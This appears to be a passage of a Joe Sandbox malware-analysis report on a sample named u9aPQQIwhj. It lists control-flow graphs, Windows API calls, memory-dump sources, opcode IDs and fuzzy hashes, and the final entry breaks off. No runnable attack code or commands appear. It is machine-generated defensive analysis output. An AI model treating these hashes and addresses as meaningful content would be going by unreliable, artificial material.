                                                  • Instruction Fuzzy Hash: D7026D34A0024A8FEB14DF68C580A9DB7F2FB85354F1089BAD409EB251DB35ED96CF91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 696 3889320c-3889329f GetCurrentProcess 701 388932a8-388932dc GetCurrentThread 696->701 702 388932a1-388932a7 696->702 703 388932de-388932e4 701->703 704 388932e5-38893319 GetCurrentProcess 701->704 702->701 703->704 706 3889331b-38893321 704->706 707 38893322-3889333d call 388933e0 704->707 706->707 709 38893343-38893372 GetCurrentThreadId 707->709 711 3889337b-388933dd 709->711 712 38893374-3889337a 709->712 712->711
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 3889328E
                                                  • GetCurrentThread.KERNEL32 ref: 388932CB
                                                  • GetCurrentProcess.KERNEL32 ref: 38893308
                                                  • GetCurrentThreadId.KERNEL32 ref: 38893361
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: f1f37265ae5f1f98ac79fc24058d761eff6069e16b08a89ea99eecc9158b0015
                                                  • Instruction ID: f658581b1d89bdb7febe49312e8fe60c1010755a7f16e9abafd24c2b5524418a
                                                  • Opcode Fuzzy Hash: f1f37265ae5f1f98ac79fc24058d761eff6069e16b08a89ea99eecc9158b0015
                                                  • Instruction Fuzzy Hash: FC5135B09006498FDB04DFA9D948BDEBBF1EF88304F208459E459B72A0DB389985CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 719 38893210-3889329f GetCurrentProcess 723 388932a8-388932dc GetCurrentThread 719->723 724 388932a1-388932a7 719->724 725 388932de-388932e4 723->725 726 388932e5-38893319 GetCurrentProcess 723->726 724->723 725->726 728 3889331b-38893321 726->728 729 38893322-3889333d call 388933e0 726->729 728->729 731 38893343-38893372 GetCurrentThreadId 729->731 733 3889337b-388933dd 731->733 734 38893374-3889337a 731->734 734->733
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 3889328E
                                                  • GetCurrentThread.KERNEL32 ref: 388932CB
                                                  • GetCurrentProcess.KERNEL32 ref: 38893308
                                                  • GetCurrentThreadId.KERNEL32 ref: 38893361
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 6a591d5f383748d7cfde42f5cede8c8b161d9c6bb860c46529872cf03b1458e8
                                                  • Instruction ID: 0f21758ff1298ef5cf6b9c50eb16b43f43e2b6d7a3d05181469de409da7e2135
                                                  • Opcode Fuzzy Hash: 6a591d5f383748d7cfde42f5cede8c8b161d9c6bb860c46529872cf03b1458e8
                                                  • Instruction Fuzzy Hash: 735146B09006498FDB04DFA9D948BDEBBF1EF88304F208459E459B73A0DB389985CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 741 39049210-39049235 742 39049237-3904923a 741->742 743 39049260-39049263 742->743 744 3904923c-3904925b 742->744 745 39049b23-39049b25 743->745 746 39049269-3904927e 743->746 744->743 747 39049b27 745->747 748 39049b2c-39049b2f 745->748 753 39049296-390492ac 746->753 754 39049280-39049286 746->754 747->748 748->742 750 39049b35-39049b3f 748->750 758 390492b7-390492b9 753->758 755 39049288 754->755 756 3904928a-3904928c 754->756 755->753 756->753 759 390492d1-39049342 758->759 760 390492bb-390492c1 758->760 771 39049344-39049367 759->771 772 3904936e-3904938a 759->772 761 390492c5-390492c7 760->761 762 390492c3 760->762 761->759 762->759 771->772 777 390493b6-390493d1 772->777 778 3904938c-390493af 772->778 783 390493d3-390493f5 777->783 784 390493fc-39049417 777->784 778->777 783->784 789 39049442-3904944c 784->789 790 39049419-3904943b 784->790 791 3904945c-390494d6 789->791 792 3904944e-39049457 789->792 790->789 798 39049523-39049538 791->798 799 390494d8-390494f6 791->799 792->750 798->745 803 39049512-39049521 799->803 804 390494f8-39049507 799->804 803->798 803->799 804->803
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 982135423185b9a0a27739fc7bb10567f5a4963ff9c36700f527b09a0ffeed90
                                                  • Instruction ID: 1d2593434040a242191a8c709e498f3d22041b3b0eefa78bec2458e527277de8
                                                  • Opcode Fuzzy Hash: 982135423185b9a0a27739fc7bb10567f5a4963ff9c36700f527b09a0ffeed90
                                                  • Instruction Fuzzy Hash: D4917F34B4020A9FDB54DB64C9507AEB3F6AFC8744F1089B9C519EB344EA30EC468F92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 807 3904d008-3904d023 808 3904d025-3904d028 807->808 809 3904d071-3904d074 808->809 810 3904d02a-3904d06c 808->810 811 3904d076-3904d0b8 809->811 812 3904d0bd-3904d0c0 809->812 810->809 811->812 813 3904d0c2-3904d0c4 812->813 814 3904d0cf-3904d0d2 812->814 816 3904d3af-3904d3b8 813->816 817 3904d0ca 813->817 818 3904d0d4-3904d0e3 814->818 819 3904d11b-3904d11e 814->819 821 3904d3c7-3904d3d3 816->821 822 3904d3ba-3904d3bf 816->822 817->814 823 3904d0e5-3904d0ea 818->823 824 3904d0f2-3904d0fe 818->824 825 3904d167-3904d16a 819->825 826 3904d120-3904d162 819->826 828 3904d4e4-3904d4e9 821->828 829 3904d3d9-3904d3ed 821->829 822->821 823->824 830 3904d104-3904d116 824->830 831 3904da25-3904da5e 824->831 832 3904d174-3904d177 825->832 833 3904d16c-3904d171 825->833 826->825 849 3904d4f1 828->849 829->849 850 3904d3f3-3904d405 829->850 830->819 848 3904da60-3904da63 831->848 837 3904d1c0-3904d1c3 832->837 838 3904d179-3904d1bb 832->838 833->832 842 3904d1c5-3904d1db 837->842 843 3904d1e0-3904d1e3 837->843 838->837 842->843 851 3904d1e5-3904d227 843->851 852 3904d22c-3904d22f 843->852 855 3904da65 call 3904db7d 848->855 856 3904da72-3904da75 848->856 854 3904d4f4-3904d500 849->854 872 3904d407-3904d40d 850->872 873 3904d429-3904d42b 850->873 851->852 852->854 858 3904d235-3904d238 852->858 854->818 864 3904d506-3904d7f3 854->864 877 3904da6b-3904da6d 855->877 868 3904da77-3904da93 856->868 869 3904da98-3904da9b 856->869 866 3904d281-3904d284 858->866 867 3904d23a-3904d27c 858->867 1019 3904d7f9-3904d7ff 864->1019 1020 3904da1a-3904da24 864->1020 875 3904d286-3904d2c8 866->875 876 3904d2cd-3904d2d0 866->876 867->866 868->869 870 3904da9d-3904dac9 869->870 871 3904dace-3904dad0 869->871 870->871 882 3904dad7-3904dada 871->882 883 3904dad2 871->883 885 3904d411-3904d41d 872->885 886 3904d40f 872->886 895 3904d435-3904d441 873->895 875->876 880 3904d2d2-3904d2ee 876->880 881 3904d2f3-3904d2f6 876->881 877->856 880->881 892 3904d33f-3904d342 881->892 893 3904d2f8-3904d33a 881->893 882->848 891 3904dadc-3904daeb 882->891 883->882 894 3904d41f-3904d427 885->894 886->894 919 3904db52-3904db67 891->919 920 3904daed-3904db50 call 39046670 891->920 904 3904d344-3904d346 892->904 905 3904d351-3904d354 892->905 893->892 894->895 925 3904d443-3904d44d 895->925 926 3904d44f 895->926 904->849 910 3904d34c 904->910 911 3904d356-3904d365 905->911 912 3904d39d-3904d39f 905->912 910->905 923 3904d374-3904d380 911->923 924 3904d367-3904d36c 911->924 915 3904d3a6-3904d3a9 912->915 916 3904d3a1 912->916 915->808 915->816 916->915 920->919 923->831 931 3904d386-3904d398 923->931 924->923 929 3904d454-3904d456 925->929 926->929 929->849 936 3904d45c-3904d478 call 39046670 929->936 931->912 952 3904d487-3904d493 936->952 953 3904d47a-3904d47f 936->953 952->828 955 3904d495-3904d4e2 952->955 953->952 955->849 1021 3904d801-3904d806 1019->1021 1022 3904d80e-3904d817 1019->1022 1021->1022 1022->831 1023 3904d81d-3904d830 1022->1023 1025 3904d836-3904d83c 1023->1025 1026 3904da0a-3904da14 1023->1026 1027 3904d83e-3904d843 1025->1027 1028 3904d84b-3904d854 1025->1028 1026->1019 1026->1020 1027->1028 1028->831 1029 3904d85a-3904d87b 1028->1029 1032 3904d87d-3904d882 1029->1032 1033 3904d88a-3904d893 1029->1033 1032->1033 1033->831 1034 3904d899-3904d8b6 1033->1034 1034->1026 1037 3904d8bc-3904d8c2 1034->1037 1037->831 1038 3904d8c8-3904d8e1 1037->1038 1040 3904d8e7-3904d90e 1038->1040 1041 3904d9fd-3904da04 1038->1041 1040->831 1044 3904d914-3904d91e 1040->1044 1041->1026 1041->1037 1044->831 1045 3904d924-3904d93b 1044->1045 1047 3904d93d-3904d948 1045->1047 1048 3904d94a-3904d965 1045->1048 1047->1048 1048->1041 1053 3904d96b-3904d984 call 39046670 1048->1053 1057 3904d986-3904d98b 1053->1057 1058 3904d993-3904d99c 1053->1058 1057->1058 1058->831 1059 3904d9a2-3904d9f6 1058->1059 1059->1041
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q
                                                  • API String ID: 0-831282457
                                                  • Opcode ID: 73c5816b749c99096a52d979095c8decb9bfcdea93910386bbacef0b40c5852f
                                                  • Instruction ID: 92935455596512e902f68204ef1525f6ce69f978dc006499b4f44089393a440d
                                                  • Opcode Fuzzy Hash: 73c5816b749c99096a52d979095c8decb9bfcdea93910386bbacef0b40c5852f
                                                  • Instruction Fuzzy Hash: 276219356002069FCB15DB68D590A4EB7F2FF84344B218A69D0199F369DB71FD8ACBC1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1067 39044c68-39044c8c 1068 39044c8e-39044c91 1067->1068 1069 39044cb2-39044cb5 1068->1069 1070 39044c93-39044cad 1068->1070 1071 39045394-39045396 1069->1071 1072 39044cbb-39044db3 1069->1072 1070->1069 1074 3904539d-390453a0 1071->1074 1075 39045398 1071->1075 1090 39044e36-39044e3d 1072->1090 1091 39044db9-39044e06 call 39045511 1072->1091 1074->1068 1077 390453a6-390453b3 1074->1077 1075->1074 1092 39044ec1-39044eca 1090->1092 1093 39044e43-39044eb3 1090->1093 1104 39044e0c-39044e28 1091->1104 1092->1077 1110 39044eb5 1093->1110 1111 39044ebe 1093->1111 1108 39044e33-39044e34 1104->1108 1109 39044e2a 1104->1109 1108->1090 1109->1108 1110->1111 1111->1092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fcq$XPcq$\Ocq
                                                  • API String ID: 0-3575482020
                                                  • Opcode ID: 15a5811767a4c6a38f8b00312ee1436f219bc93d810c569a47352fe1d2183d71
                                                  • Instruction ID: 64bbbbee48cda617b28eef47ebbabf952ccc43f56ab17547755a70dc6ee7f5a1
                                                  • Opcode Fuzzy Hash: 15a5811767a4c6a38f8b00312ee1436f219bc93d810c569a47352fe1d2183d71
                                                  • Instruction Fuzzy Hash: D8619030B002089FEB149FA5C8557AEBBF6FF88340F208569E105AB391DF759D458F91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1941 39049200-39049235 1943 39049237-3904923a 1941->1943 1944 39049260-39049263 1943->1944 1945 3904923c-3904925b 1943->1945 1946 39049b23-39049b25 1944->1946 1947 39049269-3904927e 1944->1947 1945->1944 1948 39049b27 1946->1948 1949 39049b2c-39049b2f 1946->1949 1954 39049296-390492ac 1947->1954 1955 39049280-39049286 1947->1955 1948->1949 1949->1943 1951 39049b35-39049b3f 1949->1951 1959 390492b7-390492b9 1954->1959 1956 39049288 1955->1956 1957 3904928a-3904928c 1955->1957 1956->1954 1957->1954 1960 390492d1-39049342 1959->1960 1961 390492bb-390492c1 1959->1961 1972 39049344-39049367 1960->1972 1973 3904936e-3904938a 1960->1973 1962 390492c5-390492c7 1961->1962 1963 390492c3 1961->1963 1962->1960 1963->1960 1972->1973 1978 390493b6-390493d1 1973->1978 1979 3904938c-390493af 1973->1979 1984 390493d3-390493f5 1978->1984 1985 390493fc-39049417 1978->1985 1979->1978 1984->1985 1990 39049442-3904944c 1985->1990 1991 39049419-3904943b 1985->1991 1992 3904945c-390494d6 1990->1992 1993 3904944e-39049457 1990->1993 1991->1990 1999 39049523-39049538 1992->1999 2000 390494d8-390494f6 1992->2000 1993->1951 1999->1946 2004 39049512-39049521 2000->2004 2005 390494f8-39049507 2000->2005 2004->1999 2004->2000 2005->2004
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q
                                                  • API String ID: 0-355816377
                                                  • Opcode ID: fdac36bf44031fc13ab20de2f5d485b0e280aeb4063dcb349be60b12a15e18da
                                                  • Instruction ID: 2a86dfc5d3eac4ac26b622ed2a4ba15c20798970c83ee0344ca210e1ed66d1f0
                                                  • Opcode Fuzzy Hash: fdac36bf44031fc13ab20de2f5d485b0e280aeb4063dcb349be60b12a15e18da
                                                  • Instruction Fuzzy Hash: ED516E30B442059FDB44DB64C990BAE77F6AFC8744F108979C50AEB345EA34EC428FA6

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2008 39044c59-39044c8c 2009 39044c8e-39044c91 2008->2009 2010 39044cb2-39044cb5 2009->2010 2011 39044c93-39044cad 2009->2011 2012 39045394-39045396 2010->2012 2013 39044cbb-39044db3 2010->2013 2011->2010 2015 3904539d-390453a0 2012->2015 2016 39045398 2012->2016 2031 39044e36-39044e3d 2013->2031 2032 39044db9-39044e06 call 39045511 2013->2032 2015->2009 2018 390453a6-390453b3 2015->2018 2016->2015 2033 39044ec1-39044eca 2031->2033 2034 39044e43-39044eb3 2031->2034 2045 39044e0c-39044e28 2032->2045 2033->2018 2051 39044eb5 2034->2051 2052 39044ebe 2034->2052 2049 39044e33-39044e34 2045->2049 2050 39044e2a 2045->2050 2049->2031 2050->2049 2051->2052 2052->2033
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fcq$XPcq
                                                  • API String ID: 0-936005338
                                                  • Opcode ID: 6270fe32ef3ad833af0fb26bccadda88315465ec43edd424288f2014c383134f
                                                  • Instruction ID: f1be77b5a4615807e894715ae0d30fa742f17707afc6006ff1c65c79921f94eb
                                                  • Opcode Fuzzy Hash: 6270fe32ef3ad833af0fb26bccadda88315465ec43edd424288f2014c383134f
                                                  • Instruction Fuzzy Hash: 39516F70B002089FEB159FB9C855BAEBBF7BFC8700F208529E145AB395DA759C058F91
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3889D902
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 1e49121f9de33a1f180959d5e1335d43da946cc89667f43f6fdacb6b8af84b2b
                                                  • Instruction ID: 10c0a4998deba2a749c17ab13a88387f82165466b3cb3643acd0a00104183030
                                                  • Opcode Fuzzy Hash: 1e49121f9de33a1f180959d5e1335d43da946cc89667f43f6fdacb6b8af84b2b
                                                  • Instruction Fuzzy Hash: 2A51E0B0D00319DFDB14CFAAC884ADEBBF5BF48314F60812AE819AB211D7709885CF94
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3889D902
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 8d80707b791ef40b7ac1cea33b988c58393159c43bda6cf3119a9916b4294a77
                                                  • Instruction ID: 8e5e36fbea63dccfce80af3b5f4112eb9c77f87edb980a5665f4f6e50dbdce74
                                                  • Opcode Fuzzy Hash: 8d80707b791ef40b7ac1cea33b988c58393159c43bda6cf3119a9916b4294a77
                                                  • Instruction Fuzzy Hash: B741C0B1D003099FDB14CFAAC880ADEBBF5BF48314F60812AE819AB211D7719945CF95
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 39410101
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937450476.0000000039410000.00000040.00000800.00020000.00000000.sdmp, Offset: 39410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39410000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 3cb48824604c73b8e67c3f9e00db9393db0f5131f43c882f97a4a1967b444c27
                                                  • Instruction ID: 3add12bfe64dd4555eb7b48dfa80836e5a892b5cd527ba754d4ba023d732866d
                                                  • Opcode Fuzzy Hash: 3cb48824604c73b8e67c3f9e00db9393db0f5131f43c882f97a4a1967b444c27
                                                  • Instruction Fuzzy Hash: EA4129B8A00309CFDB04CF9AC848A9ABBF5FF89314F24C459D558AB321D775A941CFA0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 388934DF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 0bb1096b9194a33c09b69c51dbc7891383d3e2bb384e27fae3de13ff173948df
                                                  • Instruction ID: c9f19237961f34c072d0a51a73c436705133063f112fa2b57f4de9a96d99dcec
                                                  • Opcode Fuzzy Hash: 0bb1096b9194a33c09b69c51dbc7891383d3e2bb384e27fae3de13ff173948df
                                                  • Instruction Fuzzy Hash: 552103B5D00248AFDB10CFAAD484ADEBFF8FB48310F14805AE954A7310D375A950CFA1
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 388934DF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 31351f7b800bc6e654fa2b5192650313ec23560eb7cf0d6702e3caead5ae98b1
                                                  • Instruction ID: c9cb27019c9c5b60db52e997bb2bf14b6e6a7f87e8ee28de6bab633225d02d1e
                                                  • Opcode Fuzzy Hash: 31351f7b800bc6e654fa2b5192650313ec23560eb7cf0d6702e3caead5ae98b1
                                                  • Instruction Fuzzy Hash: D921F5B59002189FDB10CFAAD584ADEFFF4FB48310F14801AE954A3310D375A954CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 394125CD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937450476.0000000039410000.00000040.00000800.00020000.00000000.sdmp, Offset: 39410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39410000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: a41ac4e7e381cbf6a8b8bf9331538024e974f89c62fb01ee10bbf1b4c8197f11
                                                  • Instruction ID: 8dc01b4d2602d42bf578904a7b72947aae8963aab52045ff61c1d5c31d9cf41c
                                                  • Opcode Fuzzy Hash: a41ac4e7e381cbf6a8b8bf9331538024e974f89c62fb01ee10bbf1b4c8197f11
                                                  • Instruction Fuzzy Hash: 5F1130B09007488FCB10DFAAD884BCEBFF4EB48320F20845AD558A7250D379A984CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 394125CD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937450476.0000000039410000.00000040.00000800.00020000.00000000.sdmp, Offset: 39410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39410000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 6159a2e276be2e1d8872a61c3b92d15526c178d875167a31fe6d103bfe170179
                                                  • Instruction ID: e402fd1ab6d5bd2c1ab61bb84c49ebd34222ed3cbfc4d95ca3a55fe6d7ab8662
                                                  • Opcode Fuzzy Hash: 6159a2e276be2e1d8872a61c3b92d15526c178d875167a31fe6d103bfe170179
                                                  • Instruction Fuzzy Hash: 811112B59047488FCB20DFAAD584BDEFBF8EB48320F20845AD558A7310D375AA44CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: c2e7a197ea4d83a3f3118e9bcd48c8e613471bed3b4783419f01d2990b64fcdb
                                                  • Instruction ID: aa0e479e26204aea66eb5482f74b913b2595a00fbbbe6821394f50b48ba04ab9
                                                  • Opcode Fuzzy Hash: c2e7a197ea4d83a3f3118e9bcd48c8e613471bed3b4783419f01d2990b64fcdb
                                                  • Instruction Fuzzy Hash: A581E131B00205DFDB159B68D4942AEBBA2EB89311F24847DD816EF345EB35DC4BCB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q
                                                  • API String ID: 0-2625958711
                                                  • Opcode ID: ffaa1a687b6c85ec46fea73cffeeb7860a7659cfb059cacc4dee52d89832844d
                                                  • Instruction ID: d7dce30330bc3f3fc2fd407de5a084c76547563ba1cb378f010470798a22e029
                                                  • Opcode Fuzzy Hash: ffaa1a687b6c85ec46fea73cffeeb7860a7659cfb059cacc4dee52d89832844d
                                                  • Instruction Fuzzy Hash: 98318E70E14309CFDB15CBA5D8466AEBBB1FF96301F10446AE821EB290E7749D4A8B51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q
                                                  • API String ID: 0-2625958711
                                                  • Opcode ID: 9a08ce21b131f702b24eb2c772af080515465d3c8476284767ffb152068276f1
                                                  • Instruction ID: 34c2723a933ce750c8873929a85a34b729ffe8eae37f5ac098a45092435314d4
                                                  • Opcode Fuzzy Hash: 9a08ce21b131f702b24eb2c772af080515465d3c8476284767ffb152068276f1
                                                  • Instruction Fuzzy Hash: 7741C431B00912CFDB249A78C4A166E77A2EF95711F608929E86ADF394DB34EC46C7C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q
                                                  • API String ID: 0-2625958711
                                                  • Opcode ID: 92ded29c99c9851e4bd6a6deeebe39cca26dd0494c8cf33b44bcefcd529cfa02
                                                  • Instruction ID: 61744bde4418a0f429ae3122d2c201a91b8690d7d14e88385b66be71c711829d
                                                  • Opcode Fuzzy Hash: 92ded29c99c9851e4bd6a6deeebe39cca26dd0494c8cf33b44bcefcd529cfa02
                                                  • Instruction Fuzzy Hash: C241D430B00A11CFDB249A78C4A176E77A3EF95711F204529E86ADF294D734ED49C7C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: 8076f93672cdff8fed94093efdc5a02a8c1b78c30891b03288c13b207b3bf63b
                                                  • Instruction ID: 126337a10ab11128ea5fe1652303c3ae606e19fdd0ed60bc6c507486e7ff81cd
                                                  • Opcode Fuzzy Hash: 8076f93672cdff8fed94093efdc5a02a8c1b78c30891b03288c13b207b3bf63b
                                                  • Instruction Fuzzy Hash: 0741CF71A0034A9FEB01DFA5C85469EBBF2BF85340F2149BAD415EB240EB70B946CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: d77fd5483425e82fc955496085484762d5669ccab2907f15635dfca2b88db261
                                                  • Instruction ID: 02e068bdd7d4db868417a568bc0de19a55b5e50aee0aa109579078a29fc21843
                                                  • Opcode Fuzzy Hash: d77fd5483425e82fc955496085484762d5669ccab2907f15635dfca2b88db261
                                                  • Instruction Fuzzy Hash: 8C31EE31B002019FDB199F34D5542AE77A2ABC9301F20493CD806EB391EF35DD4ACB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: 5ae8676deb51e1f20527f7fd1f3ee5b9cd8d5d368bcc20122294e92c12d77040
                                                  • Instruction ID: a6ec87bae124a382142227d6a6c02e16279fd7771b86f6c16659357dd3951093
                                                  • Opcode Fuzzy Hash: 5ae8676deb51e1f20527f7fd1f3ee5b9cd8d5d368bcc20122294e92c12d77040
                                                  • Instruction Fuzzy Hash: A9319E317002019FEB05AB78C5556AF7AE3AFC9250F1089B8D406EB391DE39ED468FA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q
                                                  • API String ID: 0-2625958711
                                                  • Opcode ID: 799f998ac00ca66ba332b98fbeca31bfbf057529cefc95c23d4e32ec18506e59
